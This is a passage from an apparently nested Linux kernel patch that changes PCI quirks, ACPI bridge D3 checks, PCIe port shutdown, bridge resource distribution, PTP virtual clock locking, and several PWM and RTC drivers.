++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT4, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT5, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT6, loongson_mrrs_quirk);
+ 
+ static void loongson_pci_pin_quirk(struct pci_dev *pdev)
+ {
+diff --git a/drivers/pci/hotplug/pciehp_hpc.c b/drivers/pci/hotplug/pciehp_hpc.c
+index 10e9670eea0b0..f8c70115b6917 100644
+--- a/drivers/pci/hotplug/pciehp_hpc.c
++++ b/drivers/pci/hotplug/pciehp_hpc.c
+@@ -1088,6 +1088,8 @@ static void quirk_cmd_compl(struct pci_dev *pdev)
+ }
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_INTEL, PCI_ANY_ID,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
++DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x010e,
++			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0110,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0400,
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index 068d6745bf98c..052a611081ecd 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -976,24 +976,41 @@ bool acpi_pci_power_manageable(struct pci_dev *dev)
+ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ {
+ 	struct pci_dev *rpdev;
+-	struct acpi_device *adev;
+-	acpi_status status;
+-	unsigned long long state;
++	struct acpi_device *adev, *rpadev;
+ 	const union acpi_object *obj;
+ 
+ 	if (acpi_pci_disabled || !dev->is_hotplug_bridge)
+ 		return false;
+ 
+-	/* Assume D3 support if the bridge is power-manageable by ACPI. */
+-	if (acpi_pci_power_manageable(dev))
+-		return true;
++	adev = ACPI_COMPANION(&dev->dev);
++	if (adev) {
++		/*
++		 * If the bridge has _S0W, whether or not it can go into D3
++		 * depends on what is returned by that object.  In particular,
++		 * if the power state returned by _S0W is D2 or shallower,
++		 * entering D3 should not be allowed.
++		 */
++		if (acpi_dev_power_state_for_wake(adev) <= ACPI_STATE_D2)
++			return false;
++
++		/*
++		 * Otherwise, assume that the bridge can enter D3 so long as it
++		 * is power-manageable via ACPI.
++		 */
++		if (acpi_device_power_manageable(adev))
++			return true;
++	}
+ 
+ 	rpdev = pcie_find_root_port(dev);
+ 	if (!rpdev)
+ 		return false;
+ 
+-	adev = ACPI_COMPANION(&rpdev->dev);
+-	if (!adev)
++	if (rpdev == dev)
++		rpadev = adev;
++	else
++		rpadev = ACPI_COMPANION(&rpdev->dev);
++
++	if (!rpadev)
+ 		return false;
+ 
+ 	/*
+@@ -1001,15 +1018,15 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * doesn't supply a wakeup GPE via _PRW, it cannot signal hotplug
+ 	 * events from low-power states including D3hot and D3cold.
+ 	 */
+-	if (!adev->wakeup.flags.valid)
++	if (!rpadev->wakeup.flags.valid)
+ 		return false;
+ 
+ 	/*
+-	 * If the Root Port cannot wake itself from D3hot or D3cold, we
+-	 * can't use D3.
++	 * In the bridge-below-a-Root-Port case, evaluate _S0W for the Root Port
++	 * to verify whether or not it can signal wakeup from D3.
+ 	 */
+-	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
+-	if (ACPI_SUCCESS(status) && state < ACPI_STATE_D3_HOT)
++	if (rpadev != adev &&
++	    acpi_dev_power_state_for_wake(rpadev) <= ACPI_STATE_D2)
+ 		return false;
+ 
+ 	/*
+@@ -1018,7 +1035,7 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * bridges *below* that Root Port can also signal hotplug events
+ 	 * while in D3.
+ 	 */
+-	if (!acpi_dev_get_property(adev, "HotPlugSupportInD3",
++	if (!acpi_dev_get_property(rpadev, "HotPlugSupportInD3",
+ 				   ACPI_TYPE_INTEGER, &obj) &&
+ 	    obj->integer.value == 1)
+ 		return true;
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index da748247061d2..7a67611dc5f48 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -6017,6 +6017,7 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ {
+ 	u16 v;
+ 	int ret;
++	struct pci_host_bridge *bridge = pci_find_host_bridge(dev->bus);
+ 
+ 	if (rq < 128 || rq > 4096 || !is_power_of_2(rq))
+ 		return -EINVAL;
+@@ -6035,6 +6036,15 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ 
+ 	v = (ffs(rq) - 8) << 12;
+ 
++	if (bridge->no_inc_mrrs) {
++		int max_mrrs = pcie_get_readrq(dev);
++
++		if (rq > max_mrrs) {
++			pci_info(dev, "can't set Max_Read_Request_Size to %d; max is %d\n", rq, max_mrrs);
++			return -EINVAL;
++		}
++	}
++
+ 	ret = pcie_capability_clear_and_set_word(dev, PCI_EXP_DEVCTL,
+ 						  PCI_EXP_DEVCTL_READRQ, v);
+ 
+diff --git a/drivers/pci/pcie/portdrv.c b/drivers/pci/pcie/portdrv.c
+index 2cc2e60bcb396..46fad0d813b2b 100644
+--- a/drivers/pci/pcie/portdrv.c
++++ b/drivers/pci/pcie/portdrv.c
+@@ -501,7 +501,6 @@ static void pcie_port_device_remove(struct pci_dev *dev)
+ {
+ 	device_for_each_child(&dev->dev, NULL, remove_iter);
+ 	pci_free_irq_vectors(dev);
+-	pci_disable_device(dev);
+ }
+ 
+ /**
+@@ -727,6 +726,19 @@ static void pcie_portdrv_remove(struct pci_dev *dev)
+ 	}
+ 
+ 	pcie_port_device_remove(dev);
++
++	pci_disable_device(dev);
++}
++
++static void pcie_portdrv_shutdown(struct pci_dev *dev)
++{
++	if (pci_bridge_d3_possible(dev)) {
++		pm_runtime_forbid(&dev->dev);
++		pm_runtime_get_noresume(&dev->dev);
++		pm_runtime_dont_use_autosuspend(&dev->dev);
++	}
++
++	pcie_port_device_remove(dev);
+ }
+ 
+ static pci_ers_result_t pcie_portdrv_error_detected(struct pci_dev *dev,
+@@ -777,7 +789,7 @@ static struct pci_driver pcie_portdriver = {
+ 
+ 	.probe		= pcie_portdrv_probe,
+ 	.remove		= pcie_portdrv_remove,
+-	.shutdown	= pcie_portdrv_remove,
++	.shutdown	= pcie_portdrv_shutdown,
+ 
+ 	.err_handler	= &pcie_portdrv_err_handler,
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 20ac67d590348..494fa46f57671 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4835,6 +4835,26 @@ static int pci_quirk_brcm_acs(struct pci_dev *dev, u16 acs_flags)
+ 		PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
+ }
+ 
++/*
++ * Wangxun 10G/1G NICs have no ACS capability, and on multi-function
++ * devices, peer-to-peer transactions are not be used between the functions.
++ * So add an ACS quirk for below devices to isolate functions.
++ * SFxxx 1G NICs(em).
++ * RP1000/RP2000 10G NICs(sp).
++ */
++static int  pci_quirk_wangxun_nic_acs(struct pci_dev *dev, u16 acs_flags)
++{
++	switch (dev->device) {
++	case 0x0100 ... 0x010F:
++	case 0x1001:
++	case 0x2001:
++		return pci_acs_ctrl_enabled(acs_flags,
++			PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
++	}
++
++	return false;
++}
++
+ static const struct pci_dev_acs_enabled {
+ 	u16 vendor;
+ 	u16 device;
+@@ -4980,6 +5000,8 @@ static const struct pci_dev_acs_enabled {
+ 	{ PCI_VENDOR_ID_NXP, 0x8d9b, pci_quirk_nxp_rp_acs },
+ 	/* Zhaoxin Root/Downstream Ports */
+ 	{ PCI_VENDOR_ID_ZHAOXIN, PCI_ANY_ID, pci_quirk_zhaoxin_pcie_ports_acs },
++	/* Wangxun nics */
++	{ PCI_VENDOR_ID_WANGXUN, PCI_ANY_ID, pci_quirk_wangxun_nic_acs },
+ 	{ 0 }
+ };
+ 
+diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c
+index b4096598dbcbb..c690572b10ce7 100644
+--- a/drivers/pci/setup-bus.c
++++ b/drivers/pci/setup-bus.c
+@@ -1765,12 +1765,70 @@ static void adjust_bridge_window(struct pci_dev *bridge, struct resource *res,
+ 		add_size = size - new_size;
+ 		pci_dbg(bridge, "bridge window %pR shrunken by %pa\n", res,
+ 			&add_size);
++	} else {
++		return;
+ 	}
+ 
+ 	res->end = res->start + new_size - 1;
+-	remove_from_list(add_list, res);
++
++	/* If the resource is part of the add_list, remove it now */
++	if (add_list)
++		remove_from_list(add_list, res);
++}
++
++static void remove_dev_resource(struct resource *avail, struct pci_dev *dev,
++				struct resource *res)
++{
++	resource_size_t size, align, tmp;
++
++	size = resource_size(res);
++	if (!size)
++		return;
++
++	align = pci_resource_alignment(dev, res);
++	align = align ? ALIGN(avail->start, align) - avail->start : 0;
++	tmp = align + size;
++	avail->start = min(avail->start + tmp, avail->end + 1);
++}
++
++static void remove_dev_resources(struct pci_dev *dev, struct resource *io,
++				 struct resource *mmio,
++				 struct resource *mmio_pref)
++{
++	int i;
++
++	for (i = 0; i < PCI_NUM_RESOURCES; i++) {
++		struct resource *res = &dev->resource[i];
++
++		if (resource_type(res) == IORESOURCE_IO) {
++			remove_dev_resource(io, dev, res);
++		} else if (resource_type(res) == IORESOURCE_MEM) {
++
++			/*
++			 * Make sure prefetchable memory is reduced from
++			 * the correct resource. Specifically we put 32-bit
++			 * prefetchable memory in non-prefetchable window
++			 * if there is an 64-bit pretchable window.
++			 *
++			 * See comments in __pci_bus_size_bridges() for
++			 * more information.
++			 */
++			if ((res->flags & IORESOURCE_PREFETCH) &&
++			    ((res->flags & IORESOURCE_MEM_64) ==
++			     (mmio_pref->flags & IORESOURCE_MEM_64)))
++				remove_dev_resource(mmio_pref, dev, res);
++			else
++				remove_dev_resource(mmio, dev, res);
++		}
++	}
+ }
+ 
++/*
++ * io, mmio and mmio_pref contain the total amount of bridge window space
++ * available. This includes the minimal space needed to cover all the
++ * existing devices on the bus and the possible extra space that can be
++ * shared with the bridges.
++ */
+ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 					    struct list_head *add_list,
+ 					    struct resource io,
+@@ -1780,7 +1838,7 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 	unsigned int normal_bridges = 0, hotplug_bridges = 0;
+ 	struct resource *io_res, *mmio_res, *mmio_pref_res;
+ 	struct pci_dev *dev, *bridge = bus->self;
+-	resource_size_t io_per_hp, mmio_per_hp, mmio_pref_per_hp, align;
++	resource_size_t io_per_b, mmio_per_b, mmio_pref_per_b, align;
+ 
+ 	io_res = &bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	mmio_res = &bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1824,94 +1882,88 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 			normal_bridges++;
+ 	}
+ 
++	if (!(hotplug_bridges + normal_bridges))
++		return;
++
+ 	/*
+-	 * There is only one bridge on the bus so it gets all available
+-	 * resources which it can then distribute to the possible hotplug
+-	 * bridges below.
++	 * Calculate the amount of space we can forward from "bus" to any
++	 * downstream buses, i.e., the space left over after assigning the
++	 * BARs and windows on "bus".
+ 	 */
+-	if (hotplug_bridges + normal_bridges == 1) {
+-		dev = list_first_entry(&bus->devices, struct pci_dev, bus_list);
+-		if (dev->subordinate)
+-			pci_bus_distribute_available_resources(dev->subordinate,
+-				add_list, io, mmio, mmio_pref);
+-		return;
++	list_for_each_entry(dev, &bus->devices, bus_list) {
++		if (!dev->is_virtfn)
++			remove_dev_resources(dev, &io, &mmio, &mmio_pref);
+ 	}
+ 
+-	if (hotplug_bridges == 0)
+-		return;
+-
+ 	/*
+-	 * Calculate the total amount of extra resource space we can
+-	 * pass to bridges below this one.  This is basically the
+-	 * extra space reduced by the minimal required space for the
+-	 * non-hotplug bridges.
++	 * If there is at least one hotplug bridge on this bus it gets all
++	 * the extra resource space that was left after the reductions
++	 * above.
++	 *
++	 * If there are no hotplug bridges the extra resource space is
++	 * split between non-hotplug bridges. This is to allow possible
++	 * hotplug bridges below them to get the extra space as well.
+ 	 */
++	if (hotplug_bridges) {
++		io_per_b = div64_ul(resource_size(&io), hotplug_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), hotplug_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   hotplug_bridges);
++	} else {
++		io_per_b = div64_ul(resource_size(&io), normal_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), normal_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   normal_bridges);
++	}
++
+ 	for_each_pci_bridge(dev, bus) {
+-		resource_size_t used_size;
+ 		struct resource *res;
++		struct pci_bus *b;
+ 
+-		if (dev->is_hotplug_bridge)
++		b = dev->subordinate;
++		if (!b)
++			continue;
++		if (hotplug_bridges && !dev->is_hotplug_bridge)
+ 			continue;
+ 
++		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++
+ 		/*
+-		 * Reduce the available resource space by what the
+-		 * bridge and devices below it occupy.
++		 * Make sure the split resource space is properly aligned
++		 * for bridge windows (align it down to avoid going above
++		 * what is available).
+ 		 */
+-		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(io.start, align) - io.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			io.start = min(io.start + used_size, io.end + 1);
++		io.end = align ? io.start + ALIGN_DOWN(io_per_b, align) - 1
++			       : io.start + io_per_b - 1;
++
++		/*
++		 * The x_per_b holds the extra resource space that can be
++		 * added for each bridge but there is the minimal already
++		 * reserved as well so adjust x.start down accordingly to
++		 * cover the whole space.
++		 */
++		io.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio.start, align) - mmio.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio.start = min(mmio.start + used_size, mmio.end + 1);
++		mmio.end = align ? mmio.start + ALIGN_DOWN(mmio_per_b, align) - 1
++				 : mmio.start + mmio_per_b - 1;
++		mmio.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio_pref.start, align) -
+-			mmio_pref.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio_pref.start = min(mmio_pref.start + used_size,
+-				mmio_pref.end + 1);
+-	}
+-
+-	io_per_hp = div64_ul(resource_size(&io), hotplug_bridges);
+-	mmio_per_hp = div64_ul(resource_size(&mmio), hotplug_bridges);
+-	mmio_pref_per_hp = div64_ul(resource_size(&mmio_pref),
+-		hotplug_bridges);
+-
+-	/*
+-	 * Go over devices on this bus and distribute the remaining
+-	 * resource space between hotplug bridges.
+-	 */
+-	for_each_pci_bridge(dev, bus) {
+-		struct pci_bus *b;
+-
+-		b = dev->subordinate;
+-		if (!b || !dev->is_hotplug_bridge)
+-			continue;
+-
+-		/*
+-		 * Distribute available extra resources equally between
+-		 * hotplug-capable downstream ports taking alignment into
+-		 * account.
+-		 */
+-		io.end = io.start + io_per_hp - 1;
+-		mmio.end = mmio.start + mmio_per_hp - 1;
+-		mmio_pref.end = mmio_pref.start + mmio_pref_per_hp - 1;
++		mmio_pref.end = align ? mmio_pref.start +
++					ALIGN_DOWN(mmio_pref_per_b, align) - 1
++				      : mmio_pref.start + mmio_pref_per_b - 1;
++		mmio_pref.start -= resource_size(res);
+ 
+ 		pci_bus_distribute_available_resources(b, add_list, io, mmio,
+ 						       mmio_pref);
+ 
+-		io.start += io_per_hp;
+-		mmio.start += mmio_per_hp;
+-		mmio_pref.start += mmio_pref_per_hp;
++		io.start += io.end + 1;
++		mmio.start += mmio.end + 1;
++		mmio_pref.start += mmio_pref.end + 1;
+ 	}
+ }
+ 
+@@ -1923,6 +1975,8 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 	if (!bridge->is_hotplug_bridge)
+ 		return;
+ 
++	pci_dbg(bridge, "distributing available resources\n");
++
+ 	/* Take the initial extra resources from the hotplug port */
+ 	available_io = bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	available_mmio = bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1934,6 +1988,54 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 					       available_mmio_pref);
+ }
+ 
++static bool pci_bridge_resources_not_assigned(struct pci_dev *dev)
++{
++	const struct resource *r;
++
++	/*
++	 * If the child device's resources are not yet assigned it means we
++	 * are configuring them (not the boot firmware), so we should be
++	 * able to extend the upstream bridge resources in the same way we
++	 * do with the normal hotplug case.
++	 */
++	r = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++
++	return true;
++}
++
++static void
++pci_root_bus_distribute_available_resources(struct pci_bus *bus,
++					    struct list_head *add_list)
++{
++	struct pci_dev *dev, *bridge = bus->self;
++
++	for_each_pci_bridge(dev, bus) {
++		struct pci_bus *b;
++
++		b = dev->subordinate;
++		if (!b)
++			continue;
++
++		/*
++		 * Need to check "bridge" here too because it is NULL
++		 * in case of root bus.
++		 */
++		if (bridge && pci_bridge_resources_not_assigned(dev))
++			pci_bridge_distribute_available_resources(bridge,
++								  add_list);
++		else
++			pci_root_bus_distribute_available_resources(b, add_list);
++	}
++}
++
+ /*
+  * First try will not touch PCI bridge res.
+  * Second and later try will clear small leaf bridge res.
+@@ -1973,6 +2075,8 @@ again:
+ 	 */
+ 	__pci_bus_size_bridges(bus, add_list);
+ 
++	pci_root_bus_distribute_available_resources(bus, add_list);
++
+ 	/* Depth last, allocate resources and update the hardware. */
+ 	__pci_bus_assign_resources(bus, add_list, &fail_head);
+ 	if (add_list)
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index 6aea512e5d4ee..39db8acde61af 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -808,9 +808,8 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	struct extcon_dev *edev = tcphy->extcon;
+ 	union extcon_property_value property;
+ 	unsigned int id;
+-	bool ufp, dp;
+ 	u8 mode;
+-	int ret;
++	int ret, ufp, dp;
+ 
+ 	if (!edev)
+ 		return MODE_DFP_USB;
+diff --git a/drivers/ptp/ptp_private.h b/drivers/ptp/ptp_private.h
+index 77918a2c67018..75f58fc468a71 100644
+--- a/drivers/ptp/ptp_private.h
++++ b/drivers/ptp/ptp_private.h
+@@ -66,7 +66,7 @@ struct ptp_vclock {
+ 	struct hlist_node vclock_hash_node;
+ 	struct cyclecounter cc;
+ 	struct timecounter tc;
+-	spinlock_t lock;	/* protects tc/cc */
++	struct mutex lock;	/* protects tc/cc */
+ };
+ 
+ /*
+diff --git a/drivers/ptp/ptp_vclock.c b/drivers/ptp/ptp_vclock.c
+index 1c0ed4805c0aa..dcf752c9e0450 100644
+--- a/drivers/ptp/ptp_vclock.c
++++ b/drivers/ptp/ptp_vclock.c
+@@ -43,16 +43,16 @@ static void ptp_vclock_hash_del(struct ptp_vclock *vclock)
+ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	s64 adj;
+ 
+ 	adj = (s64)scaled_ppm << PTP_VCLOCK_FADJ_SHIFT;
+ 	adj = div_s64(adj, PTP_VCLOCK_FADJ_DENOMINATOR);
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_read(&vclock->tc);
+ 	vclock->cc.mult = PTP_VCLOCK_CC_MULT + adj;
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -60,11 +60,11 @@ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ static int ptp_vclock_adjtime(struct ptp_clock_info *ptp, s64 delta)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_adjtime(&vclock->tc, delta);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -73,12 +73,12 @@ static int ptp_vclock_gettime(struct ptp_clock_info *ptp,
+ 			      struct timespec64 *ts)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	u64 ns;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_read(&vclock->tc);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 	*ts = ns_to_timespec64(ns);
+ 
+ 	return 0;
+@@ -91,7 +91,6 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+ 	struct timespec64 pts;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -99,9 +98,10 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, timespec64_to_ns(&pts));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	*ts = ns_to_timespec64(ns);
+ 
+@@ -113,11 +113,11 @@ static int ptp_vclock_settime(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	u64 ns = timespec64_to_ns(ts);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_init(&vclock->tc, &vclock->cc, ns);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -127,7 +127,6 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -135,9 +134,10 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, ktime_to_ns(xtstamp->device));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	xtstamp->device = ns_to_ktime(ns);
+ 
+@@ -205,7 +205,7 @@ struct ptp_vclock *ptp_vclock_register(struct ptp_clock *pclock)
+ 
+ 	INIT_HLIST_NODE(&vclock->vclock_hash_node);
+ 
+-	spin_lock_init(&vclock->lock);
++	mutex_init(&vclock->lock);
+ 
+ 	vclock->clock = ptp_clock_register(&vclock->info, &pclock->dev);
+ 	if (IS_ERR_OR_NULL(vclock->clock)) {
+@@ -269,7 +269,6 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ {
+ 	unsigned int hash = vclock_index % HASH_SIZE(vclock_hash);
+ 	struct ptp_vclock *vclock;
+-	unsigned long flags;
+ 	u64 ns;
+ 	u64 vclock_ns = 0;
+ 
+@@ -281,9 +280,10 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ 		if (vclock->clock->index != vclock_index)
+ 			continue;
+ 
+-		spin_lock_irqsave(&vclock->lock, flags);
++		if (mutex_lock_interruptible(&vclock->lock))
++			break;
+ 		vclock_ns = timecounter_cyc2time(&vclock->tc, ns);
+-		spin_unlock_irqrestore(&vclock->lock, flags);
++		mutex_unlock(&vclock->lock);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index 62b6acc6373db..393a4b97fc19e 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -161,7 +161,13 @@ static int pwm_sifive_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	mutex_lock(&ddata->lock);
+ 	if (state->period != ddata->approx_period) {
+-		if (ddata->user_count != 1) {
++		/*
++		 * Don't let a 2nd user change the period underneath the 1st user.
++		 * However if ddate->approx_period == 0 this is the first time we set
++		 * any period, so let whoever gets here first set the period so other
++		 * users who agree on the period won't fail.
++		 */
++		if (ddata->user_count != 1 && ddata->approx_period) {
+ 			mutex_unlock(&ddata->lock);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/pwm/pwm-stm32-lp.c b/drivers/pwm/pwm-stm32-lp.c
+index 514ff58a4471d..f315fa106be87 100644
+--- a/drivers/pwm/pwm-stm32-lp.c
++++ b/drivers/pwm/pwm-stm32-lp.c
+@@ -127,7 +127,7 @@ static int stm32_pwm_lp_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	/* ensure CMP & ARR registers are properly written */
+ 	ret = regmap_read_poll_timeout(priv->regmap, STM32_LPTIM_ISR, val,
+-				       (val & STM32_LPTIM_CMPOK_ARROK),
++				       (val & STM32_LPTIM_CMPOK_ARROK) == STM32_LPTIM_CMPOK_ARROK,
+ 				       100, 1000);
+ 	if (ret) {
+ 		dev_err(priv->chip.dev, "ARR/CMP registers write issue\n");
+diff --git a/drivers/rtc/interface.c b/drivers/rtc/interface.c
+index 7c30cb3c764d8..499d89150afc9 100644
+--- a/drivers/rtc/interface.c
++++ b/drivers/rtc/interface.c
+@@ -392,7 +392,7 @@ int rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 		return err;
+ 	if (!rtc->ops) {
+ 		err = -ENODEV;
+-	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features) || !rtc->ops->read_alarm) {
++	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features)) {
+ 		err = -EINVAL;
+ 	} else {
+ 		memset(alarm, 0, sizeof(struct rtc_wkalrm));
+diff --git a/drivers/rtc/rtc-sun6i.c b/drivers/rtc/rtc-sun6i.c
+index ed5516089e9a0..7038f47d77ff4 100644
+--- a/drivers/rtc/rtc-sun6i.c
++++ b/drivers/rtc/rtc-sun6i.c
+@@ -136,7 +136,6 @@ struct sun6i_rtc_clk_data {
+ 	unsigned int fixed_prescaler : 16;
+ 	unsigned int has_prescaler : 1;
+ 	unsigned int has_out_clk : 1;
+-	unsigned int export_iosc : 1;
+ 	unsigned int has_losc_en : 1;
+ 	unsigned int has_auto_swt : 1;
+ };
+@@ -271,10 +270,8 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 	/* Yes, I know, this is ugly. */
+ 	sun6i_rtc = rtc;
+ 
+-	/* Only read IOSC name from device tree if it is exported */
+-	if (rtc->data->export_iosc)
+-		of_property_read_string_index(node, "clock-output-names", 2,
+-					      &iosc_name);
++	of_property_read_string_index(node, "clock-output-names", 2,
++				      &iosc_name);
+ 
+ 	rtc->int_osc = clk_hw_register_fixed_rate_with_accuracy(NULL,
+ 								iosc_name,
+@@ -315,13 +312,10 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 		goto err_register;
+ 	}
+ 
+-	clk_data->num = 2;
++	clk_data->num = 3;
+ 	clk_data->hws[0] = &rtc->hw;
+ 	clk_data->hws[1] = __clk_get_hw(rtc->ext_losc);
+-	if (rtc->data->export_iosc) {
+-		clk_data->hws[2] = rtc->int_osc;
+-		clk_data->num = 3;
+-	}
++	clk_data->hws[2] = rtc->int_osc;
+ 	of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	return;
+ 
+@@ -361,7 +355,6 @@ static const struct sun6i_rtc_clk_data sun8i_h3_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ };
+ 
